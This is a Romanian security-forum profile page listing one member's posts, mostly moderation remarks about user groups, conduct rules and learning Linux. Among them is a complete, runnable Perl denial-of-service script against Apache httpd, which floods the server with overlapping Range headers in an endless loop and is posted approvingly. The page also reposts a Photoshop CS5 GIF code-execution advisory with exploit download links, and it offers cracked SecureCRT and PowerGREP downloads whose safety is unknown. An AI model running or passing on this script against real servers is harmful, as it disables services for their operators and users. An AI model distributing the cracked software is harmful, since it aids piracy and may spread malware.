-
Posts
18714 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Nu inveti Linux cu Ubuntu... O sa dai niste click-uri pe acolo si nici nu o sa stii nimic, o sa fie ca un Windows cu o alta grafica. Eu am invatat cu Slackware si am citit Slackware Essentials (sau ceva asemanator). Si na, mai compilezi programe din surse, mai citesti documentatie pentru diverse utilitare din linia de comanda (man), mai citesti cate ceva despre kernel, despre arhitectura sistemului de operare, coreutils si binutils, ceva shell scripting... Atunci "inveti Linux", nu dand doua click-uri sa instalezi un program. A, da, desigur, inveti modificand si fisierele de configurare si observi ca nu mai merge netul, ca nu mai booteaza.. si petreci ore intregi sa iti dai seama ce dracu ai facut.
-
Aduceti-mi aminte pe messenger si o sa vorbesc cu kwe. De peferat ar fi sa gaseasca cineva astfel de "resurse", de la un alt template poate, nu stiu.
-
Nu, nu am prea stat pe acasa, nu am avut cand sa intru. Oricum, o sa intru doar seara cand nu plec pe undeva. Nu stiu sa spun o ora anume...
-
Nu, aplicati degeaba daca nu stiti nimic din domeniu respectiv, nu aveti cum sa lucrati la un proiect si nici nu invatati nimic asa. La recrutare se pun intrebari din domeniile respective si sunt acceptati doar cei care se descurca.
-
Pff, de multe ori nu arata bine aceste site-uri, poate nu au boti buni, poate nu functioneaza corect... Ca sugestie, verifica din mai multe surse.
-
Da, nu avem 7 ani sa nu avem voie sa vorbim urat si nici sa nu auzim (vedem) cuvinte vulgare. Stiu ca uneori deranjeaza, dar nu putem schimba un mod de viata. In plus, cam toti folosim astfel de cuvinte in viata cotidiana, suntem obisnuiti cu un astfel de limbaj, deci nu cred ca sunt probleme, va trebui sa te acomodezi, sa faci abstractie de ele, nu cred ca reprezinta vreo problema. Topic inchis.
-
Nu se pune nici un "Group". Nu sunt "administratorii grupului Windows", sunt "administratori Windows". Si nu se face nicio confuzie, se vede ca "Linux Administrator" nu e acelasi lucru cu "Administrator" (cine nu vede isi cumpara ochelari). Evitati comentariile inutile. @ady_adam: Facem "orice" grup, pe masura ce se ofera voluntari pentru acel grup. E posibil sa fac un grup "Trolls", doar ca cei din acel grup vor face parte si din grupul "Banned users".
-
VanDyke Secure CRT SecureCRT combines rock-solid terminal emulation with the strong encryption, data integrity, and authentication options of the Secure Shell protocol. SecureCRT provides secure remote access, file transfer, and data tunneling for everyone in your organization. Arata aproximativ asa: Features: http://www.vandyke.com/products/securecrt/features.html Download de pe site oficial (Windows, Linux, Mac): http://www.vandyke.com/download/securecrt/download.html Il folositi sa va conectati la distanta prin telnet, SSH si altele. Are cateva optiui utile. Nu stiu daca e infectata versiunea cu patch, eu o folosesc si nu am avut probleme. Download cu patch: http://www.multiupload.com/04G0P5KLF0
-
Si mai bine: http://rstcenter.com/forum/39386-powergrep-4-a.rst
-
PowerGREP is a powerful Windows grep tool. Quickly search through large numbers of files on your PC or network, including text and binary files, compressed archives, MS Word documents, Excel spreadsheets, PDF files, OpenOffice files, etc. Find the information you want with powerful text patterns (regular expressions) specifying the form of what you want, instead of literal text. Search and replace with one or many regular expressions to comprehensively maintain web sites, source code, reports, etc. Extract statistics and knowledge from logs files and large data sets. Foarte util pentru cautarea in fisiere pe baza de expresii regulate, nu e deloc greu de folosit si are o tona de optiuni. Nu stiu daca e infectat, eu il folosesc si nu am avut probleme. Screenshot de pe site-ul oficial: http://www.powergrep.com/screens/powergrep.png E portabil, nu trebuie instalat. Download: http://www.multiupload.com/Q5VT2RWE8Y
-
Adobe Photoshop CS5 GIF Remote Code Execution ##################################################################################### Application: Adobe Photoshop CS5 GIF Remote Code Execution Platforms: Adobe Photoshop CS5 (12.0 and 12.1) Exploitation: Remote code execution CVE Number: CVE-2011-2131 Adobe Vulnerability Identifier: APSB11-22 {PRL}: 2011-08 Author: Francis Provencher (Protek Research Lab's) Website: http://www.protekresearchlab.com/ Twitter: @ProtekResearch ##################################################################################### 1) Introduction 2) Timeline 3) Technical details 4) PoC ##################################################################################### =============== 1) Introduction =============== Adobe Photoshop is a graphics editing program developed and published by Adobe Systems Incorporated. Adobe's 2003 "Creative Suite" rebranding led to Adobe Photoshop 8's renaming to Adobe Photoshop CS. Thus, Adobe Photoshop CS5 is the 12th major release of Adobe Photoshop. The CS rebranding also resulted in Adobe offering numerous software packages containing multiple Adobe programs for a reduced price. Adobe Photoshop is released in two editions: Adobe Photoshop, and Adobe Photoshop Extended, with the Extended having extra 3D image creation, motion graphics editing, and advanced image analysis features.[3]. Adobe Photoshop Extended is included in all of Adobe's Creative Suite offerings except Design Standard, which includes the Adobe Photoshop edition. http://en.wikipedia.org/wiki/Adobe_Photoshop ##################################################################################### ============================ 2) Timeline ============================ 2011-06-14 - Vulnerability reported to vendor 2011-09-09 - Coordinated public release of advisory ##################################################################################### ============================ 3) Technical details ============================ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe PhotoShop CS5. User interaction is required to exploit this vulnerability in that the target must open a malicious GIF file. When the "ushort ImageHeight" is crafted with an invalid value the memory is corrupted and arbitrary code can be run on the remote host. ##################################################################################### =========== 4) The Code =========== http://www.protekresearchlab.com/exploits/PRL-2011-08.gif http://exploit-db.com/sploits/17712.zip Sursa: Adobe Photoshop CS5 GIF Remote Code Execution Cand ajung acasa il testez si eu, parca aveam Photoshop CS5...
-
Atacurile la persoana, injuraturile... se pedepsesc. Daca nu vad eu (ceea ce e foarte posibil, nu am timp sa citesc toate posturile) imi puteti trimite PM si se rezolva.
-
Vreau link-uri... Pe mine nu ma deranjeaza un "plm" aruncat acolo, nu cred ca e problema. Daca sunt injuraturi da, se primeste avertisment. Bine, la offtopic nu ma complic sa dau avertismente, nu sunt foarte interesat de acea categorie. Vreau sa vad exemple de posturi cu limbaj inadecvat.
-
Noi membri ai grupurilor: - Xander - PHP Coder - silvian0 - PHP Coder - Gecko - Designer - denjacker - Web Vulnerability Master - Lider Cred ca 2 sunt pe lista de asteptare, ramane de vazut zilele astea daca vor fi sau nu recrutati.
-
Offtopic, nu stricati topicul.
-
Update: DataKiller v0.2 Ce e nou: - Safe file delete Vedeti primul post pentru mai multe informatii.
-
Semnaturi nu stiu daca are rost, dar daca cineva are nevoie de grafica, de imagini sau altceva pentru un proiect, cred ca Designerii vor fi bucurosi sa ajute.
-
Apache httpd Remote Denial of Service (memory exhaustion) #Apache httpd Remote Denial of Service (memory exhaustion) #By Kingcope #Year 2011 # # Will result in swapping memory to filesystem on the remote side # plus killing of processes when running out of swap space. # Remote System becomes unstable. # use IO::Socket; use Parallel::ForkManager; sub usage { print "Apache Remote Denial of Service (memory exhaustion)\n"; print "by Kingcope\n"; print "usage: perl killapache.pl <host> [numforks]\n"; print "example: perl killapache.pl www.example.com 50\n"; } sub killapache { print "ATTACKING $ARGV[0] [using $numforks forks]\n"; $pm = new Parallel::ForkManager($numforks); $|=1; srand(time()); $p = ""; for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } for ($k=0;$k<$numforks;$k++) { my $pid = $pm->start and next; $x = ""; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; while(<$sock>) { } $pm->finish; } $pm->wait_all_children; print ":pPpPpppPpPPppPpppPp\n"; } sub testapache { my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; $x = <$sock>; if ($x =~ /Partial/) { print "host seems vuln\n"; return 1; } else { return 0; } } if ($#ARGV < 0) { usage; exit; } if ($#ARGV > 1) { $numforks = $ARGV[1]; } else {$numforks = 50;} $v = testapache(); if ($v == 0) { print "Host does not seem vulnerable\n"; exit; } while(1) { killapache(); } Pare promitator... Sursa: Apache httpd Remote Denial of Service (memory exhaustion)
-
Florin Salam - Cap si pajura 2011 (Live Club One Million Timisoara) - YouTube
-
La optiunea de excludere a partitiei cu Windows m-am gandit. Dar pot fi si alte fisiere pe acolo. Cred ca voi pune optiune de ocolire ?:/Windows si ?:/Program Files, ca in Documents And Settings se mai afla date, la fel si /Users pe Windows 7. Dar cred ca ma complic degeaba. O sa ma mai gandesc si cand mai am timp liber mai lucrez la el.
-
Cine vrea sa fie recrutat in acel grup, add la "grupuri_rst" si discutam. Si vedem si cat intelege din ceea ce face.
-
Nu "o sa faca furori", doar ca va fi mai complex si mai util. Astept idei si sugestii, cat despre implementare, vor putea sa contribuie cei din grupul C/C++ coder.
-
Da, sunt sigur ca daca vad "[G] Java Programmer" in loc de "Java Prgrammers", chiar daca e prima oara cand intra pe RST vor zice: "Aaaa, da ma, acum stiu, e cu grupurile alea de care nu stiu, dar "G" vine de la grupuri si m-a lamurit". Nu are rost, poate o sa pun un Italic, un stil aparte la ele, deocamdata nu e necesar.